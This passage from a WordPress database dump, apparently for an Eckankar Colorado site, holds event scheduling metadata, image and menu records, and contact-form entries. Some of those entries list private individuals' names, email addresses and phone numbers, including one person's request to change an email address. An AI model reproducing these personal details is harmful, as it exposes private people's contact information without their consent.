zone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128893,263459,'_EventShowMap',''),(128897,263459,'_EventEndDateUTC','2021-02-08 23:00:00'),(128869,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(120938,263178,'smush-complete','1'),(120939,263178,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:58220;s:12:\"smushed-size\";i:58220;s:15:\"savings-percent\";d:0;}'),(120937,263178,'smush-info','The file was compressed from 56.86 KB to 56.86 KB saving 0 percent using WP-Optimize'),(119821,262990,'original-file','2020/12/seashell-1-updraft-pre-smush-original.jpg'),(119822,262990,'smush-complete','1'),(119823,262990,'smush-info','The file was compressed from 40.40 KB to 38.52 KB saving 4.65 percent using WP-Optimize'),(119824,262990,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:41369;s:12:\"smushed-size\";i:39445;s:15:\"savings-percent\";d:4.6500000000000003552713678800500929355621337890625;}'),(128905,263459,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(120910,263178,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:27:\"2021/01/water-ripples-1.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"water-ripples-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"water-ripples-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"water-ripples-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(120909,263178,'_wp_attached_file','2021/01/water-ripples-1.jpg'),(120908,263177,'_edit_last','2'),(103546,201534,'protect_children',''),(103547,201534,'_RTECregistrationsDisabled','1'),(103548,201534,'_RTECdeadlineType','start'),(103549,201534,'_RTECwhoCanRegister','any'),(103550,201534,'_RTEClimitRegistrations','0'),(103551,201534,'_RTECmaxRegistrations','30'),(125411,263327,'_EventOrigin','events-calendar'),(125410,263327,'_EventOrigin','events-calendar'),(125423,263327,'_EventCurrencySymbol',''),(125424,263327,'_EventCurrencyPosition','prefix'),(125425,263327,'_EventCost',''),(125426,263327,'_EventURL',''),(125427,263327,'_EventTimezone','America/Denver'),(125428,263327,'_dp_original','263319'),(125429,263327,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(125405,263327,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125422,263327,'_EventVenueID','262507'),(125420,263327,'_EventShowMapLink','1'),(125421,263327,'_EventShowMap','1'),(125409,263327,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125416,263327,'_RTEClimitRegistrations','0'),(125417,263327,'_RTECmaxRegistrations','30'),(125418,263327,'boldgrid_hide_page_title','0'),(125419,263327,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-08\";s:14:\"EventStartDate\";s:19:\"2020-11-09 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-09 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(124775,263328,'_EventStartDate','2021-05-10 19:00:00'),(124776,263328,'_EventStartDateUTC','2021-05-11 01:00:00'),(124777,263328,'_EventEndDate','2021-05-10 20:30:00'),(124778,263328,'_EventEndDateUTC','2021-05-11 02:30:00'),(124779,263328,'_EventDuration','5400'),(125438,263328,'_RTECregistrationsDisabled','1'),(125430,263328,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(125434,263328,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630421;s:12:\"_EventOrigin\";i:1610630421;s:13:\"_thumbnail_id\";i:1610630421;s:26:\"_RTECregistrationsDisabled\";i:1610630421;s:17:\"_RTECdeadlineType\";i:1610630421;s:19:\"_RTECwhoCanRegister\";i:1610630421;s:23:\"_RTEClimitRegistrations\";i:1610630421;s:21:\"_RTECmaxRegistrations\";i:1610630421;s:24:\"boldgrid_hide_page_title\";i:1610630421;s:16:\"_EventRecurrence\";i:1610630421;s:17:\"_EventShowMapLink\";i:1610630421;s:13:\"_EventShowMap\";i:1610630421;s:13:\"_EventVenueID\";i:1610630421;s:20:\"_EventCurrencySymbol\";i:1610630421;s:22:\"_EventCurrencyPosition\";i:1610630421;s:10:\"_EventCost\";i:1610630421;s:9:\"_EventURL\";i:1610630421;s:14:\"_EventTimezone\";i:1610630421;s:12:\"_dp_original\";i:1610630421;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630421;s:16:\"tribe_events_cat\";i:1610655621;}'),(103647,239970,'_RTECregistrationsDisabled','1'),(103648,239970,'_RTECdeadlineType','start'),(103649,239970,'_RTECwhoCanRegister','any'),(103650,239970,'_RTEClimitRegistrations','0'),(103651,239970,'_RTECmaxRegistrations','30'),(103673,225135,'protect_children',''),(103674,225135,'_RTECregistrationsDisabled','1'),(103675,225135,'_RTECdeadlineType','start'),(103676,225135,'_RTECwhoCanRegister','any'),(103677,225135,'_RTEClimitRegistrations','0'),(103678,225135,'_RTECmaxRegistrations','30'),(38191,230895,'_wp_attachment_image_alt','Eckankar In Colorado'),(38190,230895,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:249;s:6:\"height\";i:62;s:4:\"file\";s:45:\"2019/12/co-EK-BGrid-logo-title-image-lg-3.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:44:\"co-EK-BGrid-logo-title-image-lg-3-150x62.png\";s:5:\"width\";i:150;s:6:\"height\";i:62;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:43:\"co-EK-BGrid-logo-title-image-lg-3-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:44:\"co-EK-BGrid-logo-title-image-lg-3-210x62.png\";s:5:\"width\";i:210;s:6:\"height\";i:62;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(38189,230895,'_wp_attached_file','2019/12/co-EK-BGrid-logo-title-image-lg-3.png'),(94637,261841,'_form_id','13'),(94638,261841,'_seq_num','54'),(38343,231870,'_menu_item_type','custom'),(38344,231870,'_menu_item_menu_item_parent','108956'),(38345,231870,'_menu_item_object_id','231870'),(38346,231870,'_menu_item_object','custom'),(38347,231870,'_menu_item_target','_blank'),(38348,231870,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38349,231870,'_menu_item_xfn',''),(38350,231870,'_menu_item_url','https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=WAKYPRQYTCFXE'),(38352,231871,'_menu_item_type','custom'),(38353,231871,'_menu_item_menu_item_parent','108956'),(38354,231871,'_menu_item_object_id','231871'),(38355,231871,'_menu_item_object','custom'),(38356,231871,'_menu_item_target','_blank'),(38357,231871,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38358,231871,'_menu_item_xfn',''),(38359,231871,'_menu_item_url','https://eckankar-colorado.org/wp-content/uploads/2019/12/Donation-authorization-form-12-2019-ch.pdf'),(43211,52324,'protect_children',''),(38580,79666,'protect_children','1'),(38628,33361,'protect_children',''),(41039,33553,'protect_children',''),(40874,33265,'protect_children',''),(40452,89020,'protect_children',''),(40263,88712,'protect_children',''),(39537,7161,'protect_children',''),(39538,55589,'protect_children',''),(143764,265164,'_field_32','(303) 306-8880'),(143765,265164,'_field_33','kellywinfo@gmail.com'),(39542,7173,'protect_children',''),(39543,45183,'protect_children',''),(39545,45158,'protect_children',''),(39546,45156,'protect_children',''),(39547,45155,'protect_children',''),(39548,7163,'protect_children',''),(39549,46112,'protect_children',''),(39550,45699,'protect_children',''),(39551,45700,'protect_children',''),(39552,45701,'protect_children',''),(39553,160151,'protect_children',''),(39554,45207,'protect_children',''),(39555,108956,'protect_children',''),(39556,231870,'protect_children',''),(39557,231871,'protect_children',''),(39558,109542,'protect_children',''),(39559,109543,'protect_children',''),(39563,109539,'protect_children',''),(39564,109544,'protect_children',''),(41157,33457,'protect_children',''),(41275,70278,'protect_children',''),(41393,68102,'protect_children',''),(41582,7160,'protect_children',''),(137021,264326,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:756;s:6:\"height\";i:421;s:4:\"file\";s:34:\"2021/04/2021-May-ESC-Seminar-2.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"2021-May-ESC-Seminar-2-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"2021-May-ESC-Seminar-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:34:\"2021-May-ESC-Seminar-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:34:\"2021-May-ESC-Seminar-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:34:\"2021-May-ESC-Seminar-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:34:\"2021-May-ESC-Seminar-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"2021-May-ESC-Seminar-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(42564,38781,'_wp_attachment_image_alt','Spiritual Exercises of ECK'),(90691,260628,'_field_135','richardthp@aol.com'),(44109,239970,'protect_children',''),(44110,239970,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1577649983;s:12:\"_EventOrigin\";i:1577649983;s:13:\"_thumbnail_id\";i:1577649983;s:24:\"boldgrid_hide_page_title\";i:1577649983;s:16:\"_EventRecurrence\";i:1606922734;s:17:\"_EventShowMapLink\";i:1577649983;s:13:\"_EventShowMap\";i:1577649983;s:13:\"_EventVenueID\";i:1577649983;s:15:\"_EventStartDate\";i:1577650283;s:13:\"_EventEndDate\";i:1577650283;s:18:\"_EventStartDateUTC\";i:1577650283;s:16:\"_EventEndDateUTC\";i:1577650283;s:14:\"_EventDuration\";i:1577650283;s:20:\"_EventCurrencySymbol\";i:1577649983;s:22:\"_EventCurrencyPosition\";i:1577649983;s:10:\"_EventCost\";i:1577649983;s:9:\"_EventURL\";i:1577649983;s:14:\"_EventTimezone\";i:1577649983;s:18:\"_EventTimezoneAbbr\";i:1577649983;s:12:\"_dp_original\";i:1577649983;s:16:\"tribe_events_cat\";i:1577675183;s:10:\"_edit_last\";i:1577650133;s:12:\"post_content\";i:1577650384;s:11:\"post_status\";i:1577650283;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922746;s:10:\"post_title\";i:1577650320;s:26:\"_RTECregistrationsDisabled\";i:1606922734;s:17:\"_RTECdeadlineType\";i:1606922734;s:19:\"_RTECwhoCanRegister\";i:1606922734;s:23:\"_RTEClimitRegistrations\";i:1606922734;s:21:\"_RTECmaxRegistrations\";i:1606922734;s:22:\"_EventHideFromUpcoming\";i:1606922734;}'),(44111,239970,'_EventOrigin','events-calendar'),(44112,239970,'_EventOrigin','events-calendar'),(44113,239970,'_EventOrigin','events-calendar'),(44114,239970,'_EventOrigin','events-calendar'),(44115,239970,'_EventOrigin','events-calendar'),(44116,239970,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1577649983;s:12:\"_EventOrigin\";i:1577649983;s:13:\"_thumbnail_id\";i:1577649983;s:24:\"boldgrid_hide_page_title\";i:1577649983;s:16:\"_EventRecurrence\";i:1606922734;s:17:\"_EventShowMapLink\";i:1577649983;s:13:\"_EventShowMap\";i:1577649983;s:13:\"_EventVenueID\";i:1577649983;s:15:\"_EventStartDate\";i:1577650283;s:13:\"_EventEndDate\";i:1577650283;s:18:\"_EventStartDateUTC\";i:1577650283;s:16:\"_EventEndDateUTC\";i:1577650283;s:14:\"_EventDuration\";i:1577650283;s:20:\"_EventCurrencySymbol\";i:1577649983;s:22:\"_EventCurrencyPosition\";i:1577649983;s:10:\"_EventCost\";i:1577649983;s:9:\"_EventURL\";i:1577649983;s:14:\"_EventTimezone\";i:1577649983;s:18:\"_EventTimezoneAbbr\";i:1577649983;s:12:\"_dp_original\";i:1577649983;s:16:\"tribe_events_cat\";i:1577675183;s:10:\"_edit_last\";i:1577650133;s:12:\"post_content\";i:1577650384;s:11:\"post_status\";i:1577650283;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922746;s:10:\"post_title\";i:1577650320;s:26:\"_RTECregistrationsDisabled\";i:1606922734;s:17:\"_RTECdeadlineType\";i:1606922734;s:19:\"_RTECwhoCanRegister\";i:1606922734;s:23:\"_RTEClimitRegistrations\";i:1606922734;s:21:\"_RTECmaxRegistrations\";i:1606922734;s:22:\"_EventHideFromUpcoming\";i:1606922734;}'),(44124,239970,'_EventShowMap','1'),(44125,239970,'_EventVenueID','51976'),(44126,239970,'_EventStartDate','2020-01-12 12:15:00'),(44117,239970,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1577649983;s:12:\"_EventOrigin\";i:1577649983;s:13:\"_thumbnail_id\";i:1577649983;s:24:\"boldgrid_hide_page_title\";i:1577649983;s:16:\"_EventRecurrence\";i:1606922734;s:17:\"_EventShowMapLink\";i:1577649983;s:13:\"_EventShowMap\";i:1577649983;s:13:\"_EventVenueID\";i:1577649983;s:15:\"_EventStartDate\";i:1577650283;s:13:\"_EventEndDate\";i:1577650283;s:18:\"_EventStartDateUTC\";i:1577650283;s:16:\"_EventEndDateUTC\";i:1577650283;s:14:\"_EventDuration\";i:1577650283;s:20:\"_EventCurrencySymbol\";i:1577649983;s:22:\"_EventCurrencyPosition\";i:1577649983;s:10:\"_EventCost\";i:1577649983;s:9:\"_EventURL\";i:1577649983;s:14:\"_EventTimezone\";i:1577649983;s:18:\"_EventTimezoneAbbr\";i:1577649983;s:12:\"_dp_original\";i:1577649983;s:16:\"tribe_events_cat\";i:1577675183;s:10:\"_edit_last\";i:1577650133;s:12:\"post_content\";i:1577650384;s:11:\"post_status\";i:1577650283;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922746;s:10:\"post_title\";i:1577650320;s:26:\"_RTECregistrationsDisabled\";i:1606922734;s:17:\"_RTECdeadlineType\";i:1606922734;s:19:\"_RTECwhoCanRegister\";i:1606922734;s:23:\"_RTEClimitRegistrations\";i:1606922734;s:21:\"_RTECmaxRegistrations\";i:1606922734;s:22:\"_EventHideFromUpcoming\";i:1606922734;}'),(44123,239970,'_EventShowMapLink','1'),(44127,239970,'_EventEndDate','2020-01-12 13:45:00'),(44128,239970,'_EventStartDateUTC','2020-01-12 19:15:00'),(44118,239970,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1577649983;s:12:\"_EventOrigin\";i:1577649983;s:13:\"_thumbnail_id\";i:1577649983;s:24:\"boldgrid_hide_page_title\";i:1577649983;s:16:\"_EventRecurrence\";i:1606922734;s:17:\"_EventShowMapLink\";i:1577649983;s:13:\"_EventShowMap\";i:1577649983;s:13:\"_EventVenueID\";i:1577649983;s:15:\"_EventStartDate\";i:1577650283;s:13:\"_EventEndDate\";i:1577650283;s:18:\"_EventStartDateUTC\";i:1577650283;s:16:\"_EventEndDateUTC\";i:1577650283;s:14:\"_EventDuration\";i:1577650283;s:20:\"_EventCurrencySymbol\";i:1577649983;s:22:\"_EventCurrencyPosition\";i:1577649983;s:10:\"_EventCost\";i:1577649983;s:9:\"_EventURL\";i:1577649983;s:14:\"_EventTimezone\";i:1577649983;s:18:\"_EventTimezoneAbbr\";i:1577649983;s:12:\"_dp_original\";i:1577649983;s:16:\"tribe_events_cat\";i:1577675183;s:10:\"_edit_last\";i:1577650133;s:12:\"post_content\";i:1577650384;s:11:\"post_status\";i:1577650283;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922746;s:10:\"post_title\";i:1577650320;s:26:\"_RTECregistrationsDisabled\";i:1606922734;s:17:\"_RTECdeadlineType\";i:1606922734;s:19:\"_RTECwhoCanRegister\";i:1606922734;s:23:\"_RTEClimitRegistrations\";i:1606922734;s:21:\"_RTECmaxRegistrations\";i:1606922734;s:22:\"_EventHideFromUpcoming\";i:1606922734;}'),(44122,239970,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103666,239970,'_EventHideFromUpcoming','yes'),(44119,239970,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1577649983;s:12:\"_EventOrigin\";i:1577649983;s:13:\"_thumbnail_id\";i:1577649983;s:24:\"boldgrid_hide_page_title\";i:1577649983;s:16:\"_EventRecurrence\";i:1606922734;s:17:\"_EventShowMapLink\";i:1577649983;s:13:\"_EventShowMap\";i:1577649983;s:13:\"_EventVenueID\";i:1577649983;s:15:\"_EventStartDate\";i:1577650283;s:13:\"_EventEndDate\";i:1577650283;s:18:\"_EventStartDateUTC\";i:1577650283;s:16:\"_EventEndDateUTC\";i:1577650283;s:14:\"_EventDuration\";i:1577650283;s:20:\"_EventCurrencySymbol\";i:1577649983;s:22:\"_EventCurrencyPosition\";i:1577649983;s:10:\"_EventCost\";i:1577649983;s:9:\"_EventURL\";i:1577649983;s:14:\"_EventTimezone\";i:1577649983;s:18:\"_EventTimezoneAbbr\";i:1577649983;s:12:\"_dp_original\";i:1577649983;s:16:\"tribe_events_cat\";i:1577675183;s:10:\"_edit_last\";i:1577650133;s:12:\"post_content\";i:1577650384;s:11:\"post_status\";i:1577650283;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922746;s:10:\"post_title\";i:1577650320;s:26:\"_RTECregistrationsDisabled\";i:1606922734;s:17:\"_RTECdeadlineType\";i:1606922734;s:19:\"_RTECwhoCanRegister\";i:1606922734;s:23:\"_RTEClimitRegistrations\";i:1606922734;s:21:\"_RTECmaxRegistrations\";i:1606922734;s:22:\"_EventHideFromUpcoming\";i:1606922734;}'),(44121,239970,'boldgrid_hide_page_title','1'),(44129,239970,'_EventEndDateUTC','2020-01-12 20:45:00'),(44130,239970,'_EventDuration','5400'),(44131,239970,'_EventCurrencySymbol',''),(44132,239970,'_EventCurrencyPosition','prefix'),(44133,239970,'_EventCost',''),(44134,239970,'_EventURL',''),(44135,239970,'_EventTimezone','America/Denver'),(44136,239970,'_EventTimezoneAbbr','MST'),(44138,239970,'_dp_original','225135'),(44215,239970,'_edit_lock','1610654455:2'),(44262,239970,'_edit_last','2'),(94821,261909,'_field_315','Testing 3a'),(94822,261909,'_field_316','eraeraeraserasee\nre\nre\nrw\ner\nwe'),(94823,261909,'_form_id','35'),(94824,261909,'_seq_num','39'),(94825,261911,'protect_children',''),(94826,261911,'_field_312','Test 4'),(94827,261911,'_field_313','Testing'),(94828,261911,'_field_333','555-555-5555'),(94829,261911,'_field_314','choll.03@comcast.net'),(94830,261911,'_field_315','Test Message 4'),(94831,261911,'_field_316','This is a test.\nasdljasd;fkasdklfa;dsfk\'asdkflasd;lfkasd\nsdklfgj;drgujoeptpa'),(94832,261911,'_form_id','35'),(94833,261911,'_seq_num','40'),(94837,261913,'protect_children',''),(94838,261913,'_field_312','Test 5'),(94839,261913,'_field_313','Five'),(94840,261913,'_field_333','555-555-5555'),(94841,261913,'_field_314','me@whatfgever4662.com'),(94842,261913,'_field_315','Test 5'),(94843,261913,'_field_316','Testing\nsdfadfjas;dlfjasdfadsfasdgkjgas\n\nadsf;aosdjf;alsdfjk'),(94844,261913,'_form_id','35'),(94845,261913,'_seq_num','41'),(94846,261914,'protect_children',''),(94847,261914,'_field_312','Test 6'),(94848,261914,'_field_313','Testing'),(94849,261914,'_field_333','555-555-5555'),(94850,261914,'_field_314','nonadsa@noteer.net'),(94851,261914,'_field_315','Test 6'),(94852,261914,'_field_316','dfadkgjadlkfagsd\nasdlkgajsdl;ga;sdkgasd\nasgdkljasd;lkgjasld;kj;sdg'),(94853,261914,'_form_id','35'),(94854,261914,'_seq_num','42'),(94820,261909,'_field_314','choll.03@comcast.net'),(97012,262286,'_field_286','Ginny'),(97013,262286,'_field_287','Brookhouser'),(97014,262286,'_field_288','ginnyybrook@hotmail.com'),(97015,262286,'_field_289','(303) 830-8872'),(97016,262286,'_field_290','Denver'),(97017,262286,'_field_293','esa-initiator-fred-bell-denver-metro-central'),(96266,262168,'_field_75','Covering all my bases.... sent a msg from the main site too. This is a request to change my old email address (pdwinter@aol.com) to my new email: pwinter11@gmail.com.\nthank you and with gratitude, in ECK, 